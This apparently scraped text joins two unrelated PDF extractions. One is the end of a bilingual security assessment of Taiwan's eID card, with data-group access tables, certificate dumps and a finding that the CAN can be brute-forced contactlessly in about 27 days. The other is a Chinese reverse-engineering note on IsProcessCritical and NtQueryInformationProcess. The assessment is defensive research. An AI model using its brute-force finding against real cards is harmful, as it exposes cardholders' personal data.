000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000009000
49
姜
Identifying Potential Vulnerabilities
識別可能弱點
50
Information
Collection
資訊收集
Learning How
it Works?
確認運作方式
Identifying
Potential
Vulnerabilities
識別可能弱點
Key Findings
主要發現
Recommendation
建議
Security Mechanism for eMRTD in ICAO 9303-11
eMRTD 晶片的安全機制
51
Passive
Authentication
Active
Authentication
BAC (Basic Access
Control)
PACE (Password
Authenticated
Connection
Establishment)
Chip Authentication
Terminal
Authentication
Data Encryption
52
EID
Terminal
終端
EID Center
EID 中心
We don't address the chip security issue
本次不考慮晶片安全性
We also don't address security of backend system
本次也不考慮後台安全
Risk Scenario 1: Data can be accessed without permission
風險情境 1:可以在未經鑑別與許可的情況下存取卡片資料
Risk Scenario 2: Cannot use TA to forbid unauthorized
可以在未經鑑別與許可的情況下存取卡片資料
https://ninjalab.io/a-side-journey-to-titan/
Key Findings
主要發現
55
Information
Collection
資訊收集
Learning How
it Works?
確認運作方式
Identifying
Potential
Vulnerabilities
識別可能弱點
Key Findings
主要發現
Recommendation
建議
Access without TA (only PACE with CAN)
只使用 CAN 進行 PACE 鑑別後的存取
56
Zone
Accessable
DG1
△ (DG13)
DG2
○
DG3
X (6982)
DG4
X (6982)
DG5
X (6982)
DG6
X (6982)
DG7
X (6982)
DG8
X (6982)
Zone
Accessable
DG9
X (6982)
DG10
△ (DG13)
DG11
○
DG12
○
DG13
○
DG14
△ (DG13)
DG15
○
DG16
△ (DG13)
Access Encrypted Data Zone with Contact and Contactless Interface
使用接觸式與非接觸式介面存取加密區
57
Contact Interface
接觸式介面
Contactless Interface
非接觸式介面
7F218201747F4E81E85F290100421054574D4F4944564341473130303030317F498194060A04007F0007020202
02038681850401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA
67700004D41A08902C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578B
FE80451DA6F13B9C2D292B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03
A9E6B633997C8A2EE3EB5F201054574D4F4943413030383530303030307F4C12060904007F00070301020253
0500000060005F25060200010102005F24060200010102065F3781840151F4D4706828898DC1EA8AE4D929210
5D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E4BF4E719097CCD48057F4EB79C2
2F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269A6D759F65C2E27EAFF1429
C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
7F218201747F4E81E85F290100421054574D4F4944564341473130303030317F498194060A04007F0007020202
02038681850401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA
67700004D41A08902C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578B
FE80451DA6F13B9C2D292B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03
A9E6B633997C8A2EE3EB5F201054574D4F4943413030383530303030307F4C12060904007F00070301020253
0500000060005F25060200010102005F24060200010102075F3781840151F4D4706828898DC1EA8AE4D929210
5D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E4BF4E719097CCD48057F4EB79C2
2F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269A6D759F65C2E27EAFF1429
C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
58
7f21 CV_CERTIFICATE
7f4e CERTIFICATE_BODY
5f29 PROFILE_IDENTIFIER 0
42 CA_REFERENCE TW/MOIDVCAG1/00001
7f49 PUBLIC_KEY
6 OID 0.4.0.127.0.7.2.2.2.2.3
86 PUBLIC_POINT_Y
0401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA67700004D41A089
02C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578BFE80451DA6F13B9C2D2
92B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03A9E6B633997C8A2EE3EB
5f20 HOLDER_REFERENCE TW/MOICA0085/00000
7f4c HOLDER_AUTH_TEMPLATE
6 OID 0.4.0.127.0.7.3.1.2.2
53 ROLE_AND_ACCESS_RIGHTS 0000006000: Authentication-Terminal/R-DG6, R-DG7
5f25 EFFECTIVE_DATE 2020-11-20
5f24 EXPIRATION_DATE 2020-11-27
5f37 SIGNATURE
0151F4D4706828898DC1EA8AE4D9292105D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E
4BF4E719097CCD48057F4EB79C22F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269
A6D759F65C2E27EAFF1429C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
59
60
61
62
63
The performance of contactless card reading
determines the position of card
非接觸式的卡片讀取速度和卡片讀取的穩定性有關
64
The performance via contact interface is better than
performance via contactless interface
接觸式比非接觸式效能要好
63CX: Verify fail, X tries left
驗證失敗,還有 X 次可以嘗試
Ex.
63C3: Verify fail, 3 tries left.
驗證失敗,剩三次可以嘗試
65
Summary of Findings
發現摘要
• The data in the Public Data Zone can be accessed via brute force attack against CAN. Therefore,
malicious people can access data in a card without contacting a card at most 27 days
(2,400,000/86,400~27)
在可以無線存取的情況下,可以透過 CAN 暴力破解,在不接觸卡片的情況下,取得公開區的資料。
如果以讀取一次 2.4 秒計算,2400000/86400~27 天
• MRZ could be better than CAN
無線存取可以限制使用 MRZ,增加破解時間
• Cannot inactivate a terminal actively
目前使用 TA 的設計無法主動停用一台讀取終端 (卡片無法主動去讀取 CRL 或呼叫 OCSP)
• Could use SAM to protect terminal private key and shorten the validation time of AT certificate
如果真要綁定終端,可以採用 SAM 卡保護資料,同時縮短憑證有效期間
• AA mechanism could be misused
AA 認證機制可能被誤用
66
67
EID
Terminal
終端
EID Center
EID 中心
68
Obtain AA Certificate (DG15)
00 88 00 00 RND.IFD
Signature generated by the IC
Recommendation
建議
69
Information
Collection
資訊收集
Learning How
it Works?
確認運作方式
Identifying
Potential
Vulnerabilities
識別可能弱點
Key Findings
主要發現
Recommendation
建議
Conclusion and Recommendation
結論與建議
• Integrated circuit identification card can improve the security and convenience of using online
services. As every national online services may rely on the card, we should consider the security
and privacy issues carefully 數位身分識別證可以提升使用數位服務的安全性。而因為國家的身分鑑
別服務多半會支援這張卡片,所以其安全與隱私的議題需要特別考量。
• The suspended EID card adopts the specification of ICAO 9303. We did not find critical security
issues currently. 目前暫停的 EID 套用 ICAO 9303 的標準。實作上並未發現重大安全議題。
• The data in the Public Data Zone can be accessed via brute force attack against CAN 可以透過
非接觸式介面暴力破解 CAN 讀取卡片資料
• Contactless interface is very important for smart phones. We suggest to keep the interface and
adjust the associated function 非接觸式介面在智慧型手機的應用上非常重要,建議能夠保留與善用
此介面,並對可存取資料做出調整。
• 可以考慮支援 FIDO CTAP2
• As the data in the Encrypted Data Zone are not very sensitive, current software-based terminal
authentication scheme does not have significant risks. However, terminal binding would bring
inconvenience for some applications. 目前加密區當中沒存什麼資料,因此目前採用軟體憑證方式進
行終端綁定風險不明顯。反而讀取加密區要綁終端,對於某些應用來說可能會造成不便。
70
Thank You
感謝各位的聆聽
71 | pdf |
kernel32 export redirection
暂时忽略模式穿越细节知识
kernel32
IsProcessCritical
api-ms-win-core-processthreads-l1-1-2.IsProcessCritical
kernelbase!IsProcessCritical
NtQueryInformationProcess_0x1d_29
ntoskrnl
NtQueryInformationProcess真实实现体
IsProcessCritical
关于Critical Process基本情况参阅msdn
https://devblogs.microsoft.com/oldnewthing/20180216-00/?p=98035
这里仅记录下逆向该API的过程
从kernel32跟到 api-ms-win-core-processthreads-l1-1-2.dll 仅在 .rdata段显示了字符串 又指向了
kernel32
参考: https://twitter.com/MiasmRe/status/1270277962873610243
可以发现在api-ms-win-core-processthreads-l1-1-2.dll内 没有该API的 描述apiSet详细信息
只提供了名称 然后由 apisetschema.dll (该函数只导出了 anSi)进行处理
https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-i.html
apiset mechnisam
这种dll只是为了保持兼容性做到一个临时中转,也就是说该dll也是一个包装器一样的概念,没有
实际代码,它的导入表项是空的,再将(每个不同的版本,增删API在这里过滤),最后转到一个
一定会调用的函数内部。
我们知道kerenl32里面有很多API 都走了 kernelbase.dll 例如CreateFileStub
随着版本升级,如果不考虑任何因素,势必会导致kernelbase.dll越来越臃肿。
The problem is that, with this re-factoring, a single DLL might contain multiple logical sets of
APIs
因此微软重新设计了 dll架构
根据微软的dll架构设计很明显 Virtual DLL就是平时直接接触的dll kernel32,user32等
ApiSetSchema是一种机制 依赖于 apisetschema.dll
然后+ api-set兼容性dll
LogicalDll 只得是真正实现函数代码的动态链接库。
因此我们需要分析的是 kernelbase.dll!IsProcessCritical
apisetschema
apisetschema机制在早期引导阶段被激活。
Winload.exe在引导期间加载
Winload!OslpLoadAllModules
Winload!OsLoadImage
nt!MiInitializeApiSets
第二部分
https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-ii.html
介绍 ApiSetSchema的结构
kernelbase
现在才算进入正题
uf一下
ApiSetMapLoad.py: Extracts the content of the .apisetmap section (from
apisetschema.dll) to a file.
ApiSetMapParse.py: Parses the content of the .apisetmap section.
SearchFiles.py: Search for all Virtual DLL files on a system.
out_parsingapiset.txt: An output example of ApiSetMapParse.py executed on Windows
8 Consumer Preview 32-bit.
win7_64_names.txt: output from SearchFiles.py on Windows 7 SP1 64-bit.
win8_32_CP_names.txt: output from SearchFiles.py on Windows 8 Consumer Preview
32-bit.
作者介绍了ApiSetSchema的结构并提供了 python脚本,备份地址:
https://github.com/bopin2020/WindowsCamp/blob/main/NT%20Kernel/Misc/Dll_mechanis
m/apisetmap-scripts-part2.zip
0:004> uf 00007ffd`43c83070
KERNELBASE!IsProcessCritical:
00007ffd`43c83070 48895c2408 mov qword ptr [rsp+8],rbx
查询进程是否为 Critical Process 用户态先调用了
KERNELBASE!_imp_NtQueryInformationProcess
00007ffd`43c83075 57 push rdi
00007ffd`43c83076 4883ec30 sub rsp,30h
00007ffd`43c8307a 33db xor ebx,ebx
00007ffd`43c8307c 4c8d442450 lea r8,[rsp+50h]
00007ffd`43c83081 488bfa mov rdi,rdx
00007ffd`43c83084 48895c2420 mov qword ptr [rsp+20h],rbx
00007ffd`43c83089 448d4b04 lea r9d,[rbx+4]
00007ffd`43c8308d 8d531d lea edx,[rbx+1Dh]
00007ffd`43c83090 48ff15a1db0f00 call qword ptr
[KERNELBASE!_imp_NtQueryInformationProcess (00007ffd`43d80c38)]
00007ffd`43c83097 0f1f440000 nop dword ptr [rax+rax]
00007ffd`43c8309c 85c0 test eax,eax
00007ffd`43c8309e 7909 jns KERNELBASE!IsProcessCritical+0x39
(00007ffd`43c830a9) Branch
KERNELBASE!IsProcessCritical+0x30:
00007ffd`43c830a0 8bc8 mov ecx,eax
00007ffd`43c830a2 e82915efff call KERNELBASE!BaseSetLastNTError
(00007ffd`43b745d0)
00007ffd`43c830a7 eb0e jmp KERNELBASE!IsProcessCritical+0x47
(00007ffd`43c830b7) Branch
KERNELBASE!IsProcessCritical+0x39:
00007ffd`43c830a9 395c2450 cmp dword ptr [rsp+50h],ebx
00007ffd`43c830ad 0f95c3 setne bl
00007ffd`43c830b0 891f mov dword ptr [rdi],ebx
00007ffd`43c830b2 bb01000000 mov ebx,1
KERNELBASE!IsProcessCritical+0x47:
00007ffd`43c830b7 8bc3 mov eax,ebx
00007ffd`43c830b9 488b5c2440 mov rbx,qword ptr [rsp+40h]
00007ffd`43c830be 4883c430 add rsp,30h
00007ffd`43c830c2 5f pop rdi
00007ffd`43c830c3 c3 ret
NtQueryInformationProcess 第二个参数为 ProcessBreakOnTermination
从msdn上面我们可以发现 低版本该值已经有了 只不过从win8.1网上提供了该API方便调用
实际还是由NtQueryInformationProcess进0环查询的 这里涉及到syscall调用分析,不是本文的
重点。只需要理解 参数从用户态栈拷贝到内核态栈,找到KiFastCallEntry 内核调用后返回给
ntdll!NtQueryInformationProcess
ntdll NtQueryInformationProcess
3环进入内核 调用栈 通过 KiFastCallEntry
当从0环出来时 看左边 KiSystemCallExit 此时原来 NtQueryInformationProcess 第三个参数存
储查询的结果,这里已经被赋值了
第二个参数为 0x03 msdn上指示这是枚举值,但是没有表示3是何值。
__kernel_entry NTSTATUS NtQueryInformationProcess(
[in] HANDLE ProcessHandle,
[in] PROCESSINFOCLASS ProcessInformationClass,
[out] PVOID ProcessInformation,
[in] ULONG ProcessInformationLength,
[out, optional] PULONG ReturnLength
);
00 b13e6d48 8053e638 ffffffff 00000001 02b0fec4 nt!NtQueryInformationProcess
<Intermediate frames may have been skipped due to lack of complete unwind>
01 b13e6d48 7c92e4f4 (T) ffffffff 00000001 02b0fec4 nt!KiFastCallEntry+0xf8
<Intermediate frames may have been skipped due to lack of complete unwind>
02 02b0fd34 7c92d7ec (T) 7c8311b9 ffffffff 00000001 ntdll!KiFastSystemCallRet
03 02b0fd38 7c8311b9 ffffffff 00000001 02b0fec4
ntdll!NtQueryInformationProcess+0xc
通过 ntpsapi.h 我们可以知道具体含义
调用NtQueryInformationProcess 查询
ring3下 不通过IsProcessCritical 查询 Critical Process (OPEN_PROCESS_QUERY_LIMITED
privilege)
逆向 NtQueryInformationProcess
由于该函数是从 ntdll系统调用进入内核执行的,因此我们真正要逆向的是
ntoskrn.exe
由于ProcessBreakOnTermination 值为0x1d 找到调用处,但是遇到了jumpout 无法直接分析了
参考看雪上大佬的文章 我们帮助ida一起分析 (或者随后用windbg动态调试也行)
https://bbs.pediy.com/thread-259062.htm
https://www.anquanke.com/post/id/179080#h2-3
看了几遍,奈何自己的逆向水平太菜,后来才想到收藏夹中还有wrk. 还是从wrk中翻源码看吧
可以看到直接将 EPROCESS执行体中的 Flags 与
PS_PROCESS_FLAGS_BREAK_ON_TERMINATION 0x00002000UL // Break on process
termination 按位相与即可。
ProcessQuotaLimits, // qs: QUOTA_LIMITS, QUOTA_LIMITS_EX
ProcessIoCounters, // q: IO_COUNTERS
ProcessVmCounters, // q: VM_COUNTERS, VM_COUNTERS_EX, VM_COUNTERS_EX2
通过NtQueryInformationProcess 枚举系统上的 Critical Process
总结
kernel32 导出函数
apisetschema 最终回到kernelbase
进入Ntdll 到内核完成。
这类函数从win8.1开始,为了方便调用。还有IsWow64Process等都是对 NtQueryInformation*
的包装。至此,整个流程大体分析完了,但是其中一些细节和难点也还没有解决。希望对大家有
用。 | pdf |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.